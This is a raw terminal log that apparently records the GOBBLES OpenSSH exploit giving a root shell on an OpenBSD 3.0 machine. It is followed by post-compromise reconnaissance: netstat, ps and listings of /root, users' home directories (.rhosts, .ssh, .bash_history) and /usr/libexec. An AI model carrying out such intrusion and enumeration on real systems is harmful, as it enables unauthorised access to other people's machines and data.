SSH-1.99-OpenSSH_3.0 SSH-2.0-GOBBLES *GOBBLE* uname -a;id OpenBSD pufferfish 3.0 GENERIC#94 i386 uid=0(root) gid=0(wheel) groups=0(wheel) netstat -an Active Internet connections (including servers) Proto Recv-Q Send-Q Local Address Foreign Address (state) tcp 0 0 192.168.3.100.22 Hacker1.64864 ESTABLISHED tcp 0 0 *.22 *.* LISTEN tcp 0 0 127.0.0.1.587 *.* LISTEN tcp 0 0 127.0.0.1.25 *.* LISTEN tcp 0 0 *.37 *.* LISTEN tcp 0 0 *.13 *.* LISTEN tcp 0 0 *.113 *.* LISTEN tcp 0 0 *.80 *.* LISTEN tcp 0 0 127.0.0.1.111 *.* LISTEN tcp 0 0 *.111 *.* LISTEN udp 0 0 *.648 *.* udp 0 0 *.739 *.* udp 0 0 *.512 *.* udp 0 0 127.0.0.1.111 *.* udp 0 0 *.514 *.* udp 0 0 *.111 *.* tcp6 0 0 *.22 *.* LISTEN tcp6 0 0 ::1.587 *.* LISTEN tcp6 0 0 ::1.25 *.* LISTEN tcp6 0 0 *.37 *.* LISTEN tcp6 0 0 *.13 *.* LISTEN tcp6 0 0 *.113 *.* LISTEN udp6 0 0 *.512 *.* Active UNIX domain sockets Address Type Recv-Q Send-Q Inode Conn Refs Nextref Addr 0xe0b0b700 dgram 0 0 0x0 0xe0a97040 0x0 0xe0af4300 0xe0afc000 dgram 0 0 0x0 0xe0a97040 0x0 0xe0af43c0 0xe0ae1f00 dgram 0 0 0x0 0xe0a97040 0x0 0xe0a58280 0xe0add800 dgram 0 0 0x0 0xe0a97040 0x0 0x0 0xe0ace500 dgram 0 0 0xefb43dd4 0x0 0xe0b09fc0 0x0 /dev/log pwd / ls .cshrc .profile altroot bin boot bsd dev etc home lost+found mnt root sbin stand sys tmp usr var cd /home ls megla michael cd megla ls .BitchX .Xauthority .bash_history .cshrc .login .mailrc .profile .rhosts .vnc cd .BitchX ls cd .. cd /root ls .bash_history .cshrc .klogin .login .profile .sh_history .ssh cd /usr ls X11R6 bin games include lib libdata libexec lkm local mdec obj ports sbin share src cd lib ps -aux USER PID %CPU %MEM VSZ RSS TT STAT STARTED TIME COMMAND root 23614 0.0 0.1 284 208 ?? R 2:57PM 0:00.00 ps -aux root 25892 0.0 0.2 104 452 ?? Is Tue02PM 0:00.14 syslogd root 13304 0.0 0.1 64 364 ?? Is Tue02PM 0:00.00 portmap root 24196 0.0 0.6 1072 1544 ?? Ss Tue02PM 0:00.59 /usr/sbin/htt root 10597 0.0 0.2 80 472 ?? Is Tue02PM 0:00.02 inetd root 212 0.0 0.5 836 1328 ?? Ss Tue02PM 0:01.27 sendmail: acc www 25404 0.0 0.6 1072 1548 ?? I Tue02PM 0:00.01 /usr/sbin/htt www 29861 0.0 0.6 1072 1548 ?? I Tue02PM 0:00.01 /usr/sbin/htt www 1034 0.0 0.6 1072 1548 ?? I Tue02PM 0:00.00 /usr/sbin/htt www 10944 0.0 0.6 1072 1548 ?? I Tue02PM 0:00.00 /usr/sbin/htt www 2344 0.0 0.6 1072 1548 ?? I Tue02PM 0:00.00 /usr/sbin/htt root 22389 0.0 0.4 332 1148 ?? Is Tue02PM 0:00.53 /usr/sbin/ssh root 11182 0.0 0.2 224 536 ?? Is Tue02PM 0:00.31 cron root 29118 0.0 0.2 44 428 C0 Is+ Tue02PM 0:00.00 /usr/libexec/ root 17521 0.0 0.2 44 428 C1 Is+ Tue02PM 0:00.00 /usr/libexec/ root 490 0.0 0.2 44 428 C2 Is+ Tue02PM 0:00.01 /usr/libexec/ root 17375 0.0 0.2 44 428 C3 Is+ Tue02PM 0:00.00 /usr/libexec/ root 4754 0.0 0.2 44 428 C5 Is+ Tue02PM 0:00.00 /usr/libexec/ megla 17905 0.0 0.4 452 1052 ?? Is 4:26PM 0:00.22 SCREEN (scree megla 30640 0.0 0.5 828 1196 p1 Is+ 4:26PM 0:00.04 /usr/bin/bash megla 31648 0.0 0.5 828 1196 p2 Is+ 4:26PM 0:00.05 /usr/bin/bash root 1107 0.0 0.1 372 260 ?? S 2:50PM 0:00.22 //bin/sh root 32216 0.0 0.1 372 260 ?? I 2:55PM 0:00.23 //bin/sh root 26042 0.0 0.2 156 452 ?? D 2:57PM 0:00.53 find / -name root 1 0.0 0.1 332 200 ?? Is Tue02PM 0:00.02 /sbin/init ps -aux USER PID %CPU %MEM VSZ RSS TT STAT STARTED TIME COMMAND root 3408 0.0 0.1 284 208 ?? R 2:58PM 0:00.01 ps -aux root 25892 0.0 0.2 104 452 ?? Is Tue02PM 0:00.14 syslogd root 13304 0.0 0.1 64 364 ?? Is Tue02PM 0:00.00 portmap root 24196 0.0 0.6 1072 1544 ?? Ss Tue02PM 0:00.59 /usr/sbin/htt root 10597 0.0 0.2 80 472 ?? Is Tue02PM 0:00.02 inetd root 212 0.0 0.5 836 1328 ?? Ss Tue02PM 0:01.27 sendmail: acc www 25404 0.0 0.6 1072 1548 ?? I Tue02PM 0:00.01 /usr/sbin/htt www 29861 0.0 0.6 1072 1548 ?? I Tue02PM 0:00.01 /usr/sbin/htt www 1034 0.0 0.6 1072 1548 ?? I Tue02PM 0:00.00 /usr/sbin/htt www 10944 0.0 0.6 1072 1548 ?? I Tue02PM 0:00.00 /usr/sbin/htt www 2344 0.0 0.6 1072 1548 ?? I Tue02PM 0:00.00 /usr/sbin/htt root 22389 0.0 0.4 332 1148 ?? Is Tue02PM 0:00.53 /usr/sbin/ssh root 11182 0.0 0.2 224 536 ?? Ss Tue02PM 0:00.31 cron root 29118 0.0 0.2 44 428 C0 Is+ Tue02PM 0:00.00 /usr/libexec/ root 17521 0.0 0.2 44 428 C1 Is+ Tue02PM 0:00.00 /usr/libexec/ root 490 0.0 0.2 44 428 C2 Is+ Tue02PM 0:00.01 /usr/libexec/ root 17375 0.0 0.2 44 428 C3 Is+ Tue02PM 0:00.00 /usr/libexec/ root 4754 0.0 0.2 44 428 C5 Is+ Tue02PM 0:00.00 /usr/libexec/ megla 17905 0.0 0.4 452 1052 ?? Is 4:26PM 0:00.22 SCREEN (scree megla 30640 0.0 0.5 828 1196 p1 Is+ 4:26PM 0:00.04 /usr/bin/bash megla 31648 0.0 0.5 828 1196 p2 Is+ 4:26PM 0:00.05 /usr/bin/bash root 1107 0.0 0.1 372 260 ?? S 2:50PM 0:00.22 //bin/sh root 32216 0.0 0.1 372 260 ?? I 2:55PM 0:00.23 //bin/sh root 26042 0.0 0.2 156 452 ?? D 2:57PM 0:00.93 find / -name root 1 0.0 0.1 332 200 ?? Is Tue02PM 0:00.02 /sbin/init cd /usr/libexec ls afsd atrun auth comsat cpp cvs fingerd ftp-proxy ftpd getNAME getty hprop hpropd identd ipropd-master ipropd-slave kadmind kauthd kdc kerberos kfd kpasswdd kpropd ld.so lint1 lint2 locate.bigram locate.code locate.concatdb locate.mklocatedb locate.updatedb lockspool lpr mail.local makekey makewhatis ntalkd rexecd rlogind rpc.rquotad rpc.rstatd rpc.rusersd rpc.rwalld rpc.sprayd rshd safe_finger sendmail sftp-server sm.bin smrsh smtpd smtpfwdd tcpd telnetd tftpd uucpd vfontedpr vi.recover ls -l total 4376 -r-xr-xr-x 1 root bin 319488 Oct 18 2001 afsd -r-xr-xr-x 1 root bin 16384 Oct 18 2001 atrun drwxr-x--- 2 root auth 512 Oct 18 2001 auth -r-xr-xr-x 1 root bin 12288 Oct 18 2001 comsat -rwxr-xr-x 1 root wheel 69632 Oct 18 2001 cpp drwxr-xr-x 3 root wheel 512 Oct 18 2001 cvs -r-xr-xr-x 1 root bin 12288 Oct 18 2001 fingerd -r-xr-xr-x 1 root bin 28672 Oct 18 2001 ftp-proxy -r-xr-xr-x 1 root bin 73728 Oct 18 2001 ftpd -r-xr-xr-x 1 root bin 12288 Oct 18 2001 getNAME -r-xr-xr-x 1 root bin 20480 Oct 18 2001 getty -r-xr-xr-x 1 root bin 61440 Oct 18 2001 hprop -r-xr-xr-x 1 root bin 57344 Oct 18 2001 hpropd -r-xr-xr-x 1 root bin 24576 Oct 18 2001 identd -r-xr-xr-x 1 root bin 77824 Oct 18 2001 ipropd-master -r-xr-xr-x 1 root bin 86016 Oct 18 2001 ipropd-slave -r-xr-xr-x 1 root bin 102400 Oct 18 2001 kadmind -r-xr-xr-x 1 root bin 20480 Oct 18 2001 kauthd -r-xr-xr-x 1 root bin 94208 Oct 18 2001 kdc -r-xr-xr-x 1 root bin 24576 Oct 18 2001 kerberos -r-xr-xr-x 1 root bin 24576 Oct 18 2001 kfd -r-xr-xr-x 1 root bin 77824 Oct 18 2001 kpasswdd -r-xr-xr-x 1 root bin 16384 Oct 18 2001 kpropd -r-xr-xr-x 1 root bin 61440 Oct 18 2001 ld.so -r-xr-xr-x 1 root bin 135168 Oct 18 2001 lint1 -r-xr-xr-x 1 root bin 32768 Oct 18 2001 lint2 -r-xr-xr-x 1 root bin 8192 Oct 18 2001 locate.bigram -r-xr-xr-x 1 root bin 12288 Oct 18 2001 locate.code -r-xr-xr-x 1 root bin 2405 Oct 18 2001 locate.concatdb -r-xr-xr-x 1 root bin 2618 Oct 18 2001 locate.mklocatedb -r-xr-xr-x 1 root bin 3790 Oct 18 2001 locate.updatedb -r-sr-xr-x 1 root bin 12288 Oct 18 2001 lockspool drwxr-xr-x 2 root wheel 512 Oct 18 2001 lpr -r-xr-xr-x 1 root bin 16384 Oct 18 2001 mail.local -r-xr-xr-x 2 root bin 184320 Oct 18 2001 makekey -r-xr-xr-x 1 root bin 14092 Oct 18 2001 makewhatis -r-xr-xr-x 1 root bin 16384 Oct 18 2001 ntalkd -r-xr-xr-x 1 root bin 12288 Oct 18 2001 rexecd -r-xr-xr-x 1 root bin 20480 Oct 18 2001 rlogind -r-xr-xr-x 1 root bin 16384 Oct 18 2001 rpc.rquotad -r-xr-xr-x 1 root bin 24576 Oct 18 2001 rpc.rstatd -r-xr-xr-x 1 root bin 16384 Oct 18 2001 rpc.rusersd -r-xr-xr-x 1 root bin 12288 Oct 18 2001 rpc.rwalld -r-xr-xr-x 1 root bin 12288 Oct 18 2001 rpc.sprayd -r-xr-xr-x 1 root bin 20480 Oct 18 2001 rshd -r-xr-xr-x 1 root bin 12288 Oct 18 2001 safe_finger drwxr-xr-x 2 root wheel 512 Oct 18 2001 sendmail -r-xr-xr-x 1 root bin 28672 Oct 18 2001 sftp-server drwxr-xr-x 2 root wheel 512 Oct 18 2001 sm.bin -r-xr-xr-x 1 root bin 53248 Oct 18 2001 smrsh -r-x------ 1 root daemon 53248 Oct 18 2001 smtpd -r-x------ 1 root daemon 24576 Oct 18 2001 smtpfwdd -r-xr-xr-x 1 root bin 8192 Oct 18 2001 tcpd -r-xr-xr-x 1 root bin 90112 Oct 18 2001 telnetd -r-xr-xr-x 1 root bin 16384 Oct 18 2001 tftpd -r-xr-xr-x 1 root bin 12288 Oct 18 2001 uucpd -r-xr-xr-x 1 root bin 16384 Oct 18 2001 vfontedpr -r-xr-xr-x 1 root bin 2952 Oct 18 2001 vi.recover